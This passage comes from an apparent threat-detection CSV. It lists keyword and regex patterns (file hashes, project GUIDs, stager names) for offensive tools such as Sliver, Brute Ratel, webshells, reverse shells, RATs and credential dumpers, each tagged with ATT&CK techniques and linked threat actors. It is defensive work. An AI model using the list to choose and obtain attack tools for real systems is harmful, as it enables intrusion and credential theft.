"*b5abbe48ab64e19472e5540d92810c40a2f79484d96d5da9e7e8d5581a01afe1*",".{0,1000}b5abbe48ab64e19472e5540d92810c40a2f79484d96d5da9e7e8d5581a01afe1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34797" "*b5ad23ea9d77b64653171f466d8f325936a00bcc8917f6064c66ec146db8a3ba*",".{0,1000}b5ad23ea9d77b64653171f466d8f325936a00bcc8917f6064c66ec146db8a3ba.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","34798" "*b5b0c796fe213a7f4a840d46a10ad4d36eb26521c19e026ae5f46b17f390b77a*",".{0,1000}b5b0c796fe213a7f4a840d46a10ad4d36eb26521c19e026ae5f46b17f390b77a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34799" "*b5b45d5d5dce3e17d8fe1f7a8e14f0746ae1277023967dca344c61f34e4b442e*",".{0,1000}b5b45d5d5dce3e17d8fe1f7a8e14f0746ae1277023967dca344c61f34e4b442e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34800" "*b5bc556355336910d01dadab5af53e9726b1722a247bc6124ee4a3e4431ec8de*",".{0,1000}b5bc556355336910d01dadab5af53e9726b1722a247bc6124ee4a3e4431ec8de.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34801" "*b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e*",".{0,1000}b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e.{0,1000}","offensive_tool_keyword","CDK","CDK is an 
open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34803" "*B5C5BDD1-568E-44F6-91FF-B26962AF9A6C*",".{0,1000}B5C5BDD1\-568E\-44F6\-91FF\-B26962AF9A6C.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","34804" "*b5cbcd477e65b4fad4c55e22043eda8859bab60bbdaad28386cf5a70f04299cd*",".{0,1000}b5cbcd477e65b4fad4c55e22043eda8859bab60bbdaad28386cf5a70f04299cd.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","34805" "*b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8*",".{0,1000}b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34806" 
"*b5d90d409125ed0f45be4d92aef25f2ed8faca96d076d28051645c72b5ad45c9*",".{0,1000}b5d90d409125ed0f45be4d92aef25f2ed8faca96d076d28051645c72b5ad45c9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","34807" "*b5df5bd38cb4be2db37d159e001de5e5b6e9bbfc0f0e90a59827fd6290a1f05f*",".{0,1000}b5df5bd38cb4be2db37d159e001de5e5b6e9bbfc0f0e90a59827fd6290a1f05f.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34809" "*b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455*",".{0,1000}b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34810" "*B5E39D15-9678-474A-9838-4C720243968B*",".{0,1000}B5E39D15\-9678\-474A\-9838\-4C720243968B.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","#GUIDproject","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","34812" "*b5e44b2b4b1775e2effc6920974850cfc576b93e30be6deb0c15a1a0bb144571*",".{0,1000}b5e44b2b4b1775e2effc6920974850cfc576b93e30be6deb0c15a1a0bb144571.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34813" "*b5e8ccde03661cc33cc84e5cfd81badadb23a4d25a4117a92254c029c40d9c5a*",".{0,1000}b5e8ccde03661cc33cc84e5cfd81badadb23a4d25a4117a92254c029c40d9c5a.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","34814" "*b5e916565fc5a539fd8e96436a17c57e38fbec58d8bc8a450596fd03c343a774*",".{0,1000}b5e916565fc5a539fd8e96436a17c57e38fbec58d8bc8a450596fd03c343a774.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD 
Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34815" "*b5f260bb692d6c09d126750032045c6ebe5be7345f2029c7c87391005c8a421c*",".{0,1000}b5f260bb692d6c09d126750032045c6ebe5be7345f2029c7c87391005c8a421c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34816" "*b5f9ba7cbbe38220138a86b56db4acec50f670d3889505382429c489ec908214*",".{0,1000}b5f9ba7cbbe38220138a86b56db4acec50f670d3889505382429c489ec908214.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34818" "*b5f9c922325f283dbf3ed921d4584b35493ceceb8b0e750cb250de96b0d5b7de*",".{0,1000}b5f9c922325f283dbf3ed921d4584b35493ceceb8b0e750cb250de96b0d5b7de.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34819" "*b5fb07cbf59469e3e6716bde4e85056b27a27d99e3ada1d8b75bbbcfd4c1198e*",".{0,1000}b5fb07cbf59469e3e6716bde4e85056b27a27d99e3ada1d8b75bbbcfd4c1198e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34820" "*b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489*",".{0,1000}b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34821" "*b609c48dcb79bf60c039a05c4f048a001e00c1ce52c8b2e1b1d674234f9282cc*",".{0,1000}b609c48dcb79bf60c039a05c4f048a001e00c1ce52c8b2e1b1d674234f9282cc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34823" "*b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e*",".{0,1000}b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34825" "*b614be4e8653504d49488b1e14688f82bb6e96112c0780d24ce145f18751893e*",".{0,1000}b614be4e8653504d49488b1e14688f82bb6e96112c0780d24ce145f18751893e.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34826" "*b626dc080fa41c23cf358fae12dfe70ed167a78b9173ae0249d4c02b7fadb34b*",".{0,1000}b626dc080fa41c23cf358fae12dfe70ed167a78b9173ae0249d4c02b7fadb34b.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","34830" "*b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504*",".{0,1000}b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34831" "*b627074538c668963eb93db599cd44510d9141a952ded1fbac4a606a2f2b4c13*",".{0,1000}b627074538c668963eb93db599cd44510d9141a952ded1fbac4a606a2f2b4c13.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34832" "*b62764ff67244482f88ef117bf69d4ee51dc1691f6a62f3feab2dff8e94b9cdf*",".{0,1000}b62764ff67244482f88ef117bf69d4ee51dc1691f6a62f3feab2dff8e94b9cdf.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34833" "*b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4*",".{0,1000}b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34834" "*b62a8838e1abc2ec911eab920f3adc7a7e7d9f5e43daf520e868408e069aa9b8*",".{0,1000}b62a8838e1abc2ec911eab920f3adc7a7e7d9f5e43daf520e868408e069aa9b8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34835" "*b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188*",".{0,1000}b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34837" "*b63d587e4567a0f07910cf0314611a8f12f1cab4f119f40a0718782a76e413b3*",".{0,1000}b63d587e4567a0f07910cf0314611a8f12f1cab4f119f40a0718782a76e413b3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34838" "*B64_ENCODED_PAYLOAD_UUID*",".{0,1000}B64_ENCODED_PAYLOAD_UUID.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34839" "*b64c3a9b9927835384ce5106d7b3c9ade747243c5804159bfa5a64877c0a6c56*",".{0,1000}b64c3a9b9927835384ce5106d7b3c9ade747243c5804159bfa5a64877c0a6c56.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34841" "*b64encode*.:::-989-:::.*",".{0,1000}b64encode.{0,1000}\.\:\:\:\-989\-\:\:\:\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#content","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34843" "*b64payloadgen.sh*",".{0,1000}b64payloadgen\.sh.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","34844" "*b64stager*",".{0,1000}b64stager.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","#content","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","34845" "*B651A53C-FAE6-482E-A590-CA3B48B7F384*",".{0,1000}B651A53C\-FAE6\-482E\-A590\-CA3B48B7F384.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","34846" "*b6575fb3abada109a6d35ce04e8ff89e07ba765659724536e9a04921bc0dc196*",".{0,1000}b6575fb3abada109a6d35ce04e8ff89e07ba765659724536e9a04921bc0dc196.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","34848" "*b665b3db7a4ae240cf1e9526a11677bd25bd0f943bee7fd9a2df56f16a9a460f*",".{0,1000}b665b3db7a4ae240cf1e9526a11677bd25bd0f943bee7fd9a2df56f16a9a460f.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","34849" "*b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8*",".{0,1000}b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","34851" "*B67143DE-321D-4034-AC1D-C6BB2D98563F*",".{0,1000}B67143DE\-321D\-4034\-AC1D\-C6BB2D98563F.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","#GUIDproject","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","34852" "*B672DE08-269D-4AA6-8535-D3BC59BB086B*",".{0,1000}B672DE08\-269D\-4AA6\-8535\-D3BC59BB086B.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - 
T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","34853" "*b67dfdf5659268bb48626ef39bf9c2c74c0b5d34d21c232a17e07ba200be11b5*",".{0,1000}b67dfdf5659268bb48626ef39bf9c2c74c0b5d34d21c232a17e07ba200be11b5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34855" "*b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc*",".{0,1000}b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","34856" "*b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc*",".{0,1000}b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential 
Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","34857" "*b68963ec0310b012dd393c583bd5f4062b63a749e3a457e4ce9e91db50ea726b*",".{0,1000}b68963ec0310b012dd393c583bd5f4062b63a749e3a457e4ce9e91db50ea726b.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34859" "*b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c*",".{0,1000}b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
